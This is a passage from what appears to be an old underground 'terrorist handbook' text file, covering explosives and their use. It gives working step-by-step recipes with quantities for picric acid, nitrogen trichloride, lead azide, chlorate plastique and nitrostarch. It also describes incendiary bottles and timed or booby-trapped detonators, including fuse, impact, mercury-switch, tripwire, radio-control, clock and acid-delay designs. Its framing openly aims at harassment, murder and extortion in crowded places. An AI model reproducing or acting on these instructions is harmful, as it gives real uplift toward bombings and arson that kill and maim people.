up water vapor from the air.  This results in the explosive failing to detonate
when such an attempt is made.  This is rectified by mixing 94% (by weight)
ammonium nitrate with 6% fuel oil, or kerosene.  The kerosene keeps the ammonium
nitrate from absorbing moisture from the air.  An ANFO also requires a large
shockwave to set it off.


3.34       T.N.T.

     T.N.T., or Tri-Nitro-Toluene, is perhaps the second oldest known high
explosive.  Dynamite, of course, was the first.  It is certainly the best known
high explosive, since it has been popularized by early morning cartoons.  It is
the standard for comparing other explosives to, since it is the most well known.
In industry, a T.N.T. is made by a three step nitration process that is designed
to conserve the nitric and sulfuric acids which are used to make the product.  A
terrorist, however, would probably opt for the less economical one-step method.
The one step process is performed by treating toluene with very strong (fuming)
sulfuric acid.  Then, the sulfated toluene is treated with very strong (fuming)
nitric acid in an ice bath.  Cold water is added the solution, and it is
filtered.


3.35     POTASSIUM CHLORATE


     Potassium chlorate itself cannot be made in the home, but it can be
obtained from labs.  If potassium chlorate is mixed with a small amount of
vaseline, or other petroleum jelly, and a shockwave is passed through it, the
material will detonate with slightly more power than black powder.  It must,
however, be confined to detonate it in this manner.  The procedure for making
such an explosive is outlined below:


     MATERIALS                   EQUIPMENT
     _________                   _________


     potassium chlorate          zip-lock plastic bag
     (9 parts, by volume)

     petroleum jelly             clay grinding bowl
     (vaseline)                      or
     (1 part, by volume)         wooden bowl and wooden spoon



1)  Grind the potassium chlorate in the grinding bowl carefully and slowly,
    until the potassium chlorate is a very fine powder.  The finer that it is
    powdered, the faster (better)  it will detonate.

2)  Place the powder into the plastic bag.  Put the petroleum jelly into the
    plastic bag, getting as little on the sides of the bag as possible, i.e.
    put the vaseline on the potassium chlorate powder.

3)  Close the bag, and kneed the materials together until none of the potassium
    chlorate is dry powder that does not stick to the main glob.  If necessary,
    add a bit more petroleum jelly to the bag.

4)  The material must me used within 24 hours, or the mixture will react to
    greatly reduce the effectiveness of the explosive.  This reaction, however,
    is harmless, and releases no heat or dangerous products.


3.36     DYNAMITE

     The name dynamite comes from the Greek word "dynamis", meaning power.
Dynamite was invented by Nobel shortly after he made nitroglycerine.  It was
made because nitroglycerine was so dangerously sensitive to shock.  A misguided
individual with some sanity would, after making nitroglycerine (an insane act)
would immediately convert it to dynamite.  This can be done by adding various
materials to the nitroglycerine, such as sawdust.  The sawdust holds a large
weight of nitroglycerine per volume.  Other materials, such as ammonium nitrate
could be added, and they would tend to desensitize the explosive, and increase
the power.  But even these nitroglycerine compounds are not really safe.


3.37     NITROSTARCH EXPLOSIVES

     Nitrostarch explosives are simple to make, and are fairly powerful.  All
that need be done is treat various starches with a mixture of concentrated nitric
and sulfuric acids.  10 ml of concentrated sulfuric acid is added to 10 ml of
concentrated nitric acid.  To this mixture is added 0.5 grams of starch.  Cold
water is added, and the apparently unchanged nitrostarch is filtered out.
Nitrostarch explosives are of slightly lower power than T.N.T., but they are
more readily detonated.


3.38     PICRIC ACID

     Picric acid, also known as Tri-Nitro-Phenol, or T.N.P., is a military
explosive that is most often used as a booster charge to set off another less
sensitive explosive, such as T.N.T.  It another explosive that is fairly simple
to make, assuming that one can acquire the concentrated sulfuric and nitric
acids.  Its procedure for manufacture is given in many college chemistry lab
manuals, and is easy to follow.  The main problem with picric acid is its
tendency to form dangerously sensitive and unstable picrate salts, such as
potassium picrate.  For this reason, it is usually made into a safer form, such
as ammonium picrate, also called explosive D.  A social deviant would probably
use a formula similar to the one presented here to make picric acid.


     MATERIALS                         EQUIPMENT
     _________                         _________

     phenol (9.5 g)                    500 ml flask

     concentrated                      adjustable heat source
     sulfuric acid (12.5 ml)
                                       1000 ml beaker
     concentrated nitric               or other container
     acid (38 ml)                      suitable for boiling in

     distilled water                   filter paper
                                       and funnel

                                       glass stirring rod

1) Place 9.5 grams of phenol into the 500 ml flask, and carefully add 12.5
   ml of concentrated sulfuric acid and stir the mixture.

2) Put 400 ml of tap water into the 1000 ml beaker or boiling container and
   bring the water to a gentle boil.

3) After warming the 500 ml flask under hot tap water, place it in the boiling
   water, and continue to stir the mixture of phenol and acid for about thirty
   minutes.  After thirty minutes, take the flask out, and allow it to cool for
   about five minutes.

4) Pour out the boiling water used above, and after allowing the container to
   cool, use it to create an ice bath, similar to the one used in section 3.13,
   steps 3-4.  Place the 500 ml flask with the mixed acid an phenol in the ice
   bath.  Add 38 ml of concentrated nitric acid in small amounts, stirring the
   mixture constantly.  A vigorous but "harmless" reaction should occur.  When
   the mixture stops reacting vigorously, take the flask out of the ice bath.

5) Warm the ice bath container, if it is glass, and then begin boiling more tap
   water.  Place the flask containing the mixture in the boiling water, and heat
   it in the boiling water for 1.5 to 2 hours.

6) Add 100 ml of cold distilled water to the solution, and chill it in an ice
   bath until it is cold.

7) Filter out the yellowish-white picric acid crystals by pouring the solution
   through the filter paper in the funnel.  Collect the liquid and dispose of it
   in a safe place, since it is corrosive.

8) Wash out the 500 ml flask with distilled water, and put the contents of the
   filter paper in the flask.  Add 300 ml of water, and shake vigorously.

9) Re-filter the crystals, and allow them to dry.

10) Store the crystals in a safe place in a glass container, since they will
    react with metal containers to produce picrates that could explode
    spontaneously.


3.39     AMMONIUM PICRATE

     Ammonium picrate, also called Explosive D, is another safety explosive.
It requires a substantial shock to cause it to detonate, slightly less than that
required to detonate ammonium nitrate.  It is much safer than picric acid, since
it has little tendency to form hazardous unstable salts when placed in metal
containers.  It is simple to make from picric acid and clear household ammonia.
All that need be done is put the picric acid crystals into a glass container and
dissolve them in a great quantity of hot water.  Add clear household ammonia in
excess, and allow the excess ammonia to evaporate.  The powder remaining should
be ammonium picrate.


3.40   NITROGEN TRICHLORIDE

     Nitrogen trichloride, also known as chloride of azode, is an oily yellow
liquid.  It explodes violently when it is heated above 60 degrees celsius, or
when it comes in contact with an open flame or spark.  It is fairly simple to
produce.


1)  In a beaker, dissolve about 5 teaspoons of ammonium nitrate in water.
    Do not put so much ammonium nitrate into the solution that some of it
    remains undissolved in the bottom of the beaker.

2)  Collect a quantity of chlorine gas in a second beaker by mixing hydrochloric
    acid with potassium permanganate in a large flask with a stopper and glass
    pipe.

3)  Place the beaker containing the chlorine gas upside down on top of the
    beaker containing the ammonium nitrate solution, and tape the beakers
    together.  Gently heat the bottom beaker.  When this is done, oily yellow
    droplets will begin to form on the surface of the solution, and sink down
    to the bottom.  At this time, remove the heat source immediately.

    Alternately, the chlorine can be bubbled through the ammonium nitrate
    solution, rather than collecting the gas in a beaker, but this requires
    timing and a stand to hold the beaker and test tube.

    The chlorine gas can also be mixed with anhydrous ammonia gas, by gently
    heating a flask filled with clear household ammonia.  Place the glass tubes
    from the chlorine-generating flask and the tube from the ammonia-generating
    flask in another flask that contains water.

4)  Collect the yellow droplets with an eyedropper, and use them immediately,
    since nitrogen trichloride decomposes in 24 hours.


3.41     LEAD AZIDE

     Lead Azide is a material that is often used as a booster charge for
other explosive, but it does well enough on its own as a fairly sensitive
explosive.  It does not detonate too easily by percussion or impact, but it
is easily detonated by heat from an igniter wire, or a blasting cap.  It is
simple to produce, assuming that the necessary chemicals can be procured.

     By dissolving sodium azide and lead acetate in water in separate
beakers, the two materials are put into an aqueous state.  Mix the two beakers
together, and apply a gentle heat.  Add an excess of the lead acetate
solution, until no reaction occurs, and the precipitate on the bottom of the
beaker stops forming.  Filter off the solution, and wash the precipitate in
hot water.  The precipitate is lead azide, and it must be stored wet for safety.

     If lead acetate cannot be found, simply acquire acetic acid, and put
lead metal in it.  Black powder bullets work well for this purpose.


3.5     OTHER "EXPLOSIVES"

     The remaining section covers the other types of materials that can
be used to destroy property by fire.  Although none of the materials presented
here are explosives, they still produce explosive-style results.


3.51     THERMIT

     Thermit is a fuel-oxodizer mixture that is used to generate tremendous
amounts of heat.  It was not presented in section 3.23 because it does not react
nearly as readily.  It is a mixture of iron oxide and aluminum, both finely
powdered.  When it is ignited, the aluminum burns, and extracts the oxygen from
the iron oxide.  This is really two very exothermic reactions that produce a
combined temperature of about 2200 degrees C.  This is half the heat produced by
an atomic weapon.  It is difficult to ignite, however, but when it is ignited,
it is one of the most effective firestarters around.


     MATERIALS
     _________

     powdered aluminum (10 g)

     powdered iron oxide (10 g)


1) There is no special procedure or equipment required to make thermit.  Simply
   mix the two powders together, and try to make the mixture as homogenous as
   possible.  The ratio of iron oxide to aluminum is 50% / 50% by weight, and
   be made in greater or lesser amounts.

2) Ignition of thermite can be accomplished by adding a small amount of
   potassium chlorate to the thermit, and pouring a few drops of sulfuric acid
   on it.  This method and others will be discussed later in section 4.33.  The
   other method of igniting thermit is with a magnesium strip.  Finally, by
   using common sparkler-type fireworks placed in the thermit, the mixture
   can be ignited.


3.52     MOLOTOV COCKTAILS

     First used by Russians against German tanks, the Molotov cocktail is now
exclusively used by terrorists worldwide.  They are extremely simple to make, and
can produce devastating results.  By taking any highly flammable material, such
as gasoline, diesel fuel, kerosene, ethyl or methyl alcohol, lighter fluid,
turpentine, or any mixture of the above, and putting it into a large glass
bottle, anyone can make an effective firebomb.  After putting the flammable
liquid in the bottle, simply put a piece of cloth that is soaked in the liquid
in the top of the bottle so that it fits tightly.  Then, wrap some of the cloth
around the neck and tie it, but be sure to leave a few inches of lose cloth to
light.  Light the exposed cloth, and throw the bottle.  If the burning cloth
does not go out, and if the bottle breaks on impact, the contents of the bottle
will spatter over a large area near the site of impact, and burst into flame.
Flammable mixtures such as kerosene and motor oil should be mixed with a more
volatile and flammable liquid, such as gasoline, to insure ignition.  A mixture
such as tar or grease and gasoline will stick to the surface that it strikes,
and burn hotter, and be more difficult to extinguish.  A mixture such as this
must be shaken well before it is lit and thrown


3.53     CHEMICAL FIRE BOTTLE

     The chemical fire bottle is really an advanced molotov cocktail.  Rather
than using the burning cloth to ignite the flammable liquid, which has at best
a fair chance of igniting the liquid, the chemical fire bottle utilizes the very
hot and violent reaction between sulfuric acid and potassium chlorate.  When the
container breaks, the sulfuric acid in the mixture of gasoline sprays onto the
paper soaked in potassium chlorate and sugar.  The paper, when struck by the
acid, instantly bursts into a white flame, igniting the gasoline.  The chance
of failure to ignite the gasoline is less than 2%, and can be reduced to 0%, if
there is enough potassium chlorate and sugar to spare.

     MATERIALS                         EQUIPMENT
     _________                         _________

     potassium chlorate                glass bottle
     (2 teaspoons)                     (12 oz.)

     sugar (2 teaspoons)               cap for bottle,
                                       with plastic inside

     concentrated                      cooking pan with raised
     sulfuric acid (4 oz.)             edges

     gasoline (8 oz.)                  paper towels

                                       glass or plastic cup
                                       and spoon


1) Test the cap of the bottle with a few drops of sulfuric acid to make sure
   that the acid will not eat away the bottle cap during storage.  If the
   acid eats through it in 24 hours, a new top must be found and tested, until
   a cap that the acid does not eat through is found.  A glass top is excellent.

2) Carefully pour 8 oz. of gasoline into the glass bottle.

3) Carefully pour 4 oz. of concentrated sulfuric acid into the glass bottle.
   Wipe up any spills of acid on the sides of the bottle, and screw the cap on
   the bottle.  Wash the bottle's outside with plenty of water.  Set it aside
   to dry.

4) Put about two teaspoons of potassium chlorate and about two teaspoons of
   sugar into the glass or plastic cup.  Add about 1/2 cup of boiling water,
   or enough to dissolve all of the potassium chlorate and sugar.

5) Place a sheet of paper towel in the cooking pan with raised edges.  Fold
   the paper towel in half, and pour the solution of dissolved potassium
   chlorate and sugar on it until it is thoroughly wet.  Allow the towel to
   dry.

6) When it is dry, put some glue on the outside of the glass bottle containing
   the gasoline and sulfuric acid mixture.  Wrap the paper towel around the
   bottle, making sure that it sticks to it in all places.  Store the bottle
   in a place where it will not be broken or tipped over.

7) When finished, the solution in the bottle should appear as two distinct
   liquids, a dark brownish-red solution on the bottom, and a clear solution
   on top.  The two solutions will not mix.  To use the chemical fire bottle,
   simply throw it at any hard surface.

8) NEVER OPEN THE BOTTLE, SINCE SOME SULFURIC ACID MIGHT BE ON THE CAP, WHICH
   COULD TRICKLE DOWN THE SIDE OF THE BOTTLE AND IGNITE THE POTASSIUM CHLORATE,
   CAUSING A FIRE AND/OR EXPLOSION.

9) To test the device, tear a small piece of the paper towel off the bottle,
   and put a few drops of sulfuric acid on it.  The paper towel should
   immediately burst into a white flame.


3.54     BOTTLED GAS EXPLOSIVES

     Bottled gas, such as butane for refilling lighters, propane for propane
stoves or for bunsen burners, can be used to produce a powerful explosion.  To
make such a device, all that a simple-minded anarchist would have to do would be
to take his container of bottled gas and place it above a can of Sterno or other
gelatinized fuel, and light the fuel and run.  Depending on the fuel used, and
on the thickness of the fuel container, the liquid gas will boil and expand to
the point of bursting the container in about five minutes.  In theory, the gas
would immediately be ignited by the burning gelatinized fuel, producing a large
fireball and explosion.  Unfortunately, the bursting of the bottled gas container
often puts out the fuel, thus preventing the expanding gas from igniting.  By
using a metal bucket half filled with gasoline, however, the chances of ignition
are better, since the gasoline is less likely to be extinguished.  Placing the
canister of bottled gas on a bed of burning charcoal soaked in gasoline would
probably be the most effective way of securing ignition of the expanding gas,
since although the bursting of the gas container may blow out the flame of the
gasoline, the burning charcoal should immediately re-ignite it.  Nitrous oxide,
hydrogen, propane, acetylene, or any other flammable gas will do nicely.


4.0     USING EXPLOSIVES

     Once a terrorist has made his explosives, the next logical step is to
apply them.  Explosives have a wide range of uses, from harassment, to vandalism,
to murder.  NONE OF THE IDEAS PRESENTED HERE ARE EVER TO BE CARRIED OUT, EITHER
IN PART OR IN FULL!  DOING SO CAN LEAD TO PROSECUTION, FINES, AND IMPRISONMENT!
     The first step that a person that would use explosive would take would
be to determine how big an explosive device would be needed to do whatever had to
be done.  Then, he would have to decide what to make his bomb with.  He would
also have to decide on how he wanted to detonate the device, and determine where
the best placement for it would be.  Then, it would be necessary to see if the
device could be put where he wanted it without it being discovered or moved.
Finally, he would actually have to sit down and build his explosive device.
These are some of the topics covered in the next section.


4.1     SAFETY

     There is no such thing as a "safe" explosive device.  One can only speak
in terms of relative safety, or less unsafe.


4.2     IGNITION DEVICES

     There are many ways to ignite explosive devices.  There is the classic
"light the fuse, throw the bomb, and run" approach, and there are sensitive
mercury switches, and many things in between.  Generally, electrical detonation
systems are safer than fuses, but there are times when fuses are more
appropriate than electrical systems; it is difficult to carry an electrical
detonation system into a stadium, for instance, without being caught.  A device
with a fuse or impact detonating fuse would be easier to hide.


4.21     FUSE IGNITION

     The oldest form of explosive ignition, fuses are perhaps the favorite
type of simple ignition system.  By simply placing a piece of waterproof fuse in
a device, one can have almost guaranteed ignition.  Modern waterproof fuse is
extremely reliable, burning at a rate of about 2.5 seconds to the inch.  It is
available as model rocketry fuse in most hobby shops, and costs about $3.00 for
a nine-foot length.  Fuse is a popular ignition system for pipe bombers because
of its simplicity.  All that need be done is light it with a match or lighter.
     Of course, if the Army had fuses like this, then the grenade, which uses
fuse ignition, would be very impracticle.  If a grenade ignition system can be
acquired, by all means, it is the most effective.  But, since such things do not
just float around, the next best thing is to prepare a fuse system which does
not require the use of a match or lighter, but still retains its simplicity.
One such method is described below:


     MATERIALS
     _________

     strike-on-cover type matches

     electrical tape or duct tape

     waterproof fuse

1) To determine the burn rate of a particular type of fuse, simply measure a
   6 inch or longer piece of fuse and ignite it.  With a stopwatch, press the
   start button the at the instant when the fuse lights, and stop the watch when
   the fuse reaches its end.  Divide the time of burn by the length of fuse, and
   you have the burn rate of the fuse, in seconds per inch.  This will be shown
   below:

     Suppose an eight inch piece of fuse is burned, and its complete time
     of combustion is 20 seconds.


     20 seconds
     __________  = 2.5 seconds per inch.
     8 inches


     If a delay of 10 seconds was desired with this fuse, divide the desired
      time by the number of seconds per inch:

     10 seconds
     ___________________ = 4 inches
     2.5 seconds / inch

NOTE: THE LENGTH OF FUSE HERE MEANS LENGTH OF FUSE TO THE POWDER.  SOME FUSE,
      AT LEAST AN INCH, SHOULD BE INSIDE THE DEVICE.  ALWAYS ADD THIS EXTRA
      INCH, AND PUT THIS EXTRA INCH AN INCH INTO THE DEVICE!!!


2) After deciding how long a delay is desired before the explosive device is
   to go off, add about 1/2 an inch to the premeasured amount of fuse, and
   cut it off.

3) Carefully remove the cardboard matches from the paper match case.  Do not
   pull off individual matches; keep all the matches attached to the cardboard
   base.  Take one of the cardboard match sections, and leave the other one
   to make a second igniter.

4) Wrap the matches around the end of the fuse, with the heads of the matches
   touching the very end of the fuse.  Tape them there securely, making sure not
   to put tape over the match heads.  Make sure they are very secure by pulling
   on them at the base of the assembly.  They should not be able to move.

5) Wrap the cover of the matches around the matches attached to the fuse, making
   sure that the striker paper is below the match heads and the striker faces
   the match heads.  Tape the paper so that is fairly tight around the matches.
   Do not tape the cover of the striker to the fuse or to the matches.  Leave
   enough of the match book to pull on for ignition.

          _____________________
          \                   /
           \                 /  ------ match book cover
            \               /
             |    M|f|M ---|------- match head
             |    A|u|A    |
             |    T|s|T    |
             |    C|e|C    |
             |tapeH|f|Htape|
             |     |u|     |
             |#####|s|#####|-------- striking paper
             |#####|e|#####|
             \     |f|     /
              \    |u|    /
               \   |s|   /
                \  |e|  /
                |ta|f|pe|
                |ta|u|pe|
                   |s|
                   |e|
                   |f|
                   |u|
                   |s|
                   |e|

     The match book is wrapped around the matches, and is taped to itself.
     The matches are taped to the fuse.  The striker will rub against the
     matcheads when the match book is pulled.

6) When ready to use, simply pull on the match paper.  It should pull the
   striking paper across the match heads with enough friction to light them.
   In turn, the burning matcheads will light the fuse, since it adjacent to the
   burning match heads.


4.22     IMPACT IGNITION

     Impact ignition is an excellent method of ignition for spontaneous
terrorist activities.  The problem with an impact-detonating device is that it
must be kept in a very safe container so that it will not explode while being
transported to the place where it is to be used.  This can be done by having a
removable impact initiator.
     The best and most reliable impact initiator is one that uses factory
made initiators or primers.  A no. 11 cap for black powder firearms is one such
primer.  They usually come in boxes of 100, and cost about $2.50.  To use such
a cap, however, one needs a nipple that it will fit on.  Black powder nipples
are also available in gun stores.  All that a person has to do is ask for a
package of nipples and the caps that fit them.  Nipples have a hole that goes
all the way through them, and they have a threaded end, and an end to put the
cap on.  A cutaway of a nipple is shown below:

                   ________________
                  |                |
                  _                |
                 | |                 |
          _______| |^^^^^^^^|        |
          |      ___________|          |
          |     |                      |
   no. 11       |_______|                |
   percussion    _______                 | ------- threads for screwing
   cap here     |       |                |         nipple onto bomb
          |     |___________           |
          |_______          |          |
                  | |^^^^^^^|        |
                  |_|                |
                                   |
                   |_______________|



     When making using this type of initiator, a hole must be drilled into
whatever container is used to make the bomb out of.  The nipple is then screwed
into the hole so that it fits tightly.  Then, the cap can be carried and placed
on the bomb when it is to be thrown.  The cap should be bent a small amount
before it is placed on the nipple, to make sure that it stays in place.  The
only other problem involved with an impact detonating bomb is that it must
strike a hard surface on the nipple to set it off.  By attaching fins or a small
parachute on the end of the bomb opposite the primer, the bomb, when thrown,
should strike the ground on the primer, and explode.  Of course, a bomb with
mercury fulminate in each end will go off on impact regardless of which end it
strikes on, but mercury fulminate is also likely to go off if the person
carrying the bomb is bumped hard.


4.23     ELECTRICAL IGNITION

     Electrical ignition systems for detonation are usually the safest and
most reliable form of ignition.  Electrical systems are ideal for demolition
work, if one doesn't have to worry so much about being caught.  With two spools
of 500 ft of wire and a car battery, one can detonate explosives from a "safe",
comfortable distance, and be sure that there is nobody around that could get
hurt.  With an electrical system, one can control exactly what time a device
will explode, within fractions of a second.  Detonation can be aborted in  less
than a second's warning, if a person suddenly walks by the detonation sight, or
if a police car chooses to roll by at the time.  The two best electrical igniters
are military squibs and model rocketry igniters.  Blasting caps for construction
also work well.  Model rocketry igniters are sold in packages of six, and cost
about $1.00 per pack.  All that need be done to use them is connect it to two
wires and run a current through them.  Military squibs are difficult to get,
but they are a little bit better, since they explode when a current is run
through them, whereas rocketry igniters only burst into flame.  Military squibs
can be used to set off sensitive high explosives, such as R.D.X., or potassium
chlorate mixed with petroleum jelly.  Igniters can be used to set off black
powder, mercury fulminate, or guncotton, which in turn, can set of a high order
explosive.


4.24     ELECTRO-MECHANICAL IGNITION

     Electro-mechanical ignition systems are systems that use some type of
mechanical switch to set off an explosive charge electrically.  This type of
switch is typically used in booby traps or other devices in which the person
who places the bomb does not wish to be anywhere near the device when it
explodes.  Several types of electro-mechanical detonators will be discussed


4.241     Mercury Switches

     Mercury switches are a switch that uses the fact that mercury metal
conducts electricity, as do all metals, but mercury metal is a liquid at room
temperatures.  A typical mercury switch is a sealed glass tube with two
electrodes and a bead of mercury metal.  It is sealed because of mercury's nasty
habit of giving off brain-damaging vapors.  The diagram below may help to
explain a mercury switch.

                     A  /              \   B
      _____wire +______/___________     \
                       \   ( Hg )  |    /
                        \ _(_Hg_)__|___/
                                   |
                                   |
                            wire - |
                                   |
                                   |

     When the drop of mercury ("Hg" is mercury's atomic symbol) touches both
contacts, current flows through the switch.  If this particular switch was in
its present position, A---B, current would be flowing, since the mercury can
touch both contacts in the horizontal position.

     If, however, it was in the   |  position, the drop of mercury would only
touch the + contact on the A side. Current,  then could not flow, since the 
mercury does not reach both contacts when the switch is in the verticle position.

     This type of switch is ideal to place by a door.  If it were placed in
the path of a swinging door in the verticle position, the motion of the door
would knock the switch down, if it was held to the ground by a piece if tape.
This would tilt the switch into the verticle position, causing the mercury to
touch both contacts, allowing current to flow through the mercury, and to the
igniter or squib in an explosive device.  Imagine opening a door and having it
slammed in your face by an explosion.


4.242     Tripwire Switches

     A tripwire is an element of the classic booby trap.  By placing a nearly
invisible line of string or fishing line in the probable path of a victim, and
by putting some type of trap there also, nasty things can be caused to occur.
If this mode of thought is applied to explosives, how would one use such a
tripwire to detonate a bomb.  The technique is simple.  By wrapping the tips of
a standard clothespin with aluminum foil, and placing something between them,
and connecting wires to each aluminum foil contact, an electric tripwire can
be made,  If a piece of wood attached to the tripwire was placed between the
contacts on the clothespin, the clothespin would serve as a switch.  When the
tripwire was pulled, the clothespin would snap together, allowing current to
flow between the two pieces of aluminum foil, thereby completing a circuit, which

would have the igniter or squib in it.  Current would flow between the contacts
to the igniter or squib, heat the igniter or squib, causing it to explode.


                    __________________________________
                    \_foil___________________________/
 Insert strip of      ----------------------------spring
 wood with trip-      _foil__________________________
 wire between foil   /_______________________________\
 contacts.


Make sure that the aluminum foil contacts do not touch the spring, since
the spring also conducts electricity.


4.243     Radio Control Detonators

     In the movies, every terrorist or criminal uses a radio controlled
detonator to set off explosives.  With a good radio detonator, one can be
several miles away from the device, and still control exactly when it explodes,
in much the same way as an electrical switch.  The problem with radio detonators
is that they are rather costly.  However, there could possibly be a reason that
a terrorist would wish to spend the amounts of money involved with a RC (radio
control) system and use it as a detonator.  If such an individual wanted to
devise an RC detonator, all he would need to do is visit the local hobby store
or toy store, and buy a radio controlled toy.  Taking it back to his/her abode,
all that he/she would have to do is detach the solenoid/motor that controls the
motion of the front wheels of a RC car, or detach the solenoid/motor of the
elevators/rudder of a RC plane, or the rudder of a RC boat, and re-connect the
squib or rocket engine igniter to the contacts for the solenoid/motor.  The
device should be tested several times with squibs or igniters, and fully
charged batteries should be in both he controller and the receiver (the part
that used to move parts before the device became a detonator).


4.3     DELAYS

     A delay is a device which causes time to pass from when a device is
set up to the time that it explodes.  A regular fuse is a delay, but it would
cost quite a bit to have a 24 hour delay with a fuse.  This section deals with
the different types of delays that can be employed by a terrorist who wishes to
be sure that his bomb will go off, but wants to be out of the country when it
does.


4.31     FUSE DELAYS

     It is extremely simple to delay explosive devices that employ fuses for
ignition.  Perhaps the simplest way to do so is with a cigarette.  An average
cigarette burns for about 8 minutes.  The higher the "tar" and nicotine rating,
the slower the cigarette burns.  Low "tar" and nicotine cigarettes burn quicker
than the higher "tar" and nicotine cigarettes, but they are also less likely to
go out if left unattended, i.e. not smoked.  Depending on the wind or draft in
a given place, a high "tar" cigarette is better for delaying the ignition of a
fuse, but there must be enough wind or draft to give the cigarette enough oxygen
to burn.  People who use cigarettes for the purpose of delaying fuses will often
test the cigarettes that they plan to use in advance to make sure they stay lit,
and to see how long it will burn.  Once a cigarettes burn rate is determined, it
is a simple matter of carefully putting a hole all the way through a cigarette
with a toothpick at the point desired, and pushing the fuse for a device in the
hole formed.


                            |=|
                            |=| ---------- filter
                            |=|
                            | |
                            | |
                            |o| ---------- hole for fuse
 cigarette ------------     | |
                            | |
                            | |
                            | |
                            | |
                            | |
                            | |
                            | |
                            | |
                            |_| ---------- light this end


     A similar type of device can be make from powdered charcoal and a sheet
of paper.  Simply roll the sheet of paper into a thin tube, and fill it with
powdered charcoal.  Punch a hole in it at the desired location, and insert a
fuse.  Both ends must be glued closed, and one end of the delay must be doused
with lighter fluid before it is lit.  Or, a small charge of gunpowder mixed with
powdered charcoal could conceivably used for igniting such a delay.  A chain of
charcoal briquettes can be used to delay a fuse by merely lining up a few bricks
of charcoal so that they touch each other, end on end, and lighting the first
brick.  Incense, which can be purchased at almost any novelty or party supply
store, can also be used as a fairly reliable delay.  By wrapping the fuse about
the end of an incense stick, delays of up to 1/2 an hour are possible.
Finally, it is possible to make a relatively slow-burning fuse in the home.  By
dissolving about one teaspoon of black powder in about 1/4 a cup of boiling
water, and, while it is still hot, soaking in it a long piece of all cotton
string, a slow-burning fuse can be made.  After the soaked string dries, it
must then be tied to the fuse of an explosive device.  Sometimes, the end of the
slow burning fuse that meets the normal fuse has a charge of black powder or
gunpowder at the intersection point to insure ignition, since the slow-burning
fuse does not burn at a very high temperature.  A similar type of slow fuse can
be made by taking the above mixture of boiling water and black powder and pouring
it on a long piece of toilet paper.  The wet toilet paper is then gently twisted
up so that it resembles a firecracker fuse, and is allowed to dry.


4.32     TIMER DELAYS

     Timer delays, or "time bombs" are usually employed by an individual who
wishes to threaten a place with a bomb and demand money to reveal its location
and means to disarm it.  Such a device could be placed in any populated place
if it were concealed properly.  There are several ways to build a timer delay.
By simply using a screw as one contact at the time that detonation is desired,
and using the hour hand of a clock as the other contact, a simple timer can be
made.  The minute hand of a clock should be removed, unless a delay of less than
an hour is desired.


            ___________________________________  to igniter      from igniter
            |                                  |
            |               12                 |      :            :
            |         11           1           |      :            :
            |                                  |      :            :
            |     10                   2       |      :            :
            |                 o................|......:            :
            |                                  |                   :
            |   9                         3    |                   :
            |                                  |                   :
            |                                  |                   :
            |    8                      4      |                   :
            |                        o.........|......             :
            |          7             5         |     :             :
            |                 6                |     :.+.....-.....:
            |__________________________________|     __|_____|
                                        |           |
                                        |  battery  |
          o - contacts                  |           |
          ..... - wire                  |           |
                                        |___________|

     This device is set to go off in eleven hours.  When the hour hand of the
clock reaches the contact near the numeral 5, it will complete the circuit,
allowing current to flow through the igniter or squib.

     The main disadvantage with this type of timer is that it can only be set
 for a maximum time of 12 hours.  If an electronic timer is used, such as that in
an electronic clock, then delays of up to 24 hours are possible.  By removing
the speaker from an electronic clock, and attaching the wires of a squib or
igniter to them, a timer with a delay of up to 24 hours can be made.  To utilize
this type of timer, one must have a socket that the clock can be plugged into.
All that one has to do is set the alarm time of the clock to the desired time,
connect the leads, and go away.  This could also be done with an electronic
watch, if a larger battery were used, and the current to the speaker of the
watch was stepped up via a transformer.  This would be good, since such a timer
could be extremely small.  The timer in a VCR (Video Cassette Recorder) would
be ideal.  VCR's can usually be set for times of up to a week.  The leads from
the timer to the recording equipment would be the ones that an igniter or squib
would be connected to.  Also, one can buy timers from electronics stores that
would be ideal.  Finally, one could employ a digital watch, and use a relay, or
electro-magnetic switch to fire the igniter, and the current of the watch would
not have to be stepped up.


4.33     CHEMICAL DELAYS

     Chemical delays are uncommon, but they can be extremely effective in
some cases.  If a glass container is filled with concentrated sulfuric acid,
and capped with several thicknesses of aluminum foil, or a cap that it will eat
through, then it can be used as a delay.  Sulfuric acid will react with aluminum
foil to produce aluminum sulfate and hydrogen gas, and so the container must be
open to the air on one end so that the pressure of the hydrogen gas that is
forming does not break the container.


               | |             | |
               | |             | |
               | |             | |
               | |_____________| |
               | |             | |
               | |  sulfuric   | |
               | |             | |
               | |  acid       | |
               | |             | |---------- aluminum foil
               | |_____________| |           (several thicknesses)
               |_________________|


     The aluminum foil is placed over the bottom of the container and secured
there with tape.  When the acid eats through the aluminum foil, it can be used
to ignite an explosive device in several ways.

     1) Sulfuric acid is a good conductor of electricity.  If the acid that
        eats through the foil is collected in a glass container placed
        underneath the foil, and two wires are placed in the glass container,
         a current will be able to flow through the acid when both of the
        wires are immersed in the acid.

     2) Sulfuric acid reacts very violently with potassium chlorate.  If
        the acid drips down into a container containing potassium chlorate,
        the potassium chlorate will burst into flame.  This flame can be
        used to ignite a fuse, or the potassium chlorate can be the igniter
        for a thermit bomb, if some potassium chlorate is mixed in a 50/50
        ratio with the thermit, and this mixture is used as an igniter for
        the rest of the thermit.

     3) Sulfuric acid reacts with potassium permangenate in a similar way.


4.4     EXPLOSIVE CONTAINERS

     This section will cover everything from making a simple firecracker to
a complicated scheme for detonating an insensitive high explosive, both of which
are methods that could be utilized by perpetrators of terror.


4.41     PAPER CONTAINERS

     Paper was the first container ever used for explosives, since it was
first used by the Chinese to make fireworks.  Paper containers are usually very
simple to make, and are certainly the cheapest.  There are many possible uses
for paper in containing explosives, and the two most obvious are in firecrackers
and rocket engines. Simply by rolling up a long sheet of paper, and gluing it
together, one can make a simple rocket engine.  Perhaps a more interesting and
dangerous use is in the firecracker.  The firecracker shown here is one of
Mexican design.  It is called a "polumna", meaning "dove".  The process of their
manufacture is not unlike that of making a paper football.  If one takes a sheet
of paper about 16 inches in length by 1.5 inches wide, and fold one corner so
that it looks like this:

       ________________________________________________________
       |                                                      |\
       |                                                      | \
       |                                                      |  \
       |______________________________________________________|___\

       and then fold it again so that it looks like this:

       _______________________________________________________
       |                                                     /|
       |                                                    / |
       |                                                   /  |
       |__________________________________________________/___|

      A pocket is formed.  This pocket can be filled with black powder, pyrodex,
flash powder, gunpowder,rocket engine powder, or any of the quick-burning fuel-
oxodizer mixtures that occur in the form of a fine powder.  A fuse is then
inserted, and one continues the triangular folds, being careful not to spill
out any of the explosive.  When the polumna is finished, it should be taped
together very tightly, since this will increase the strength of the container,
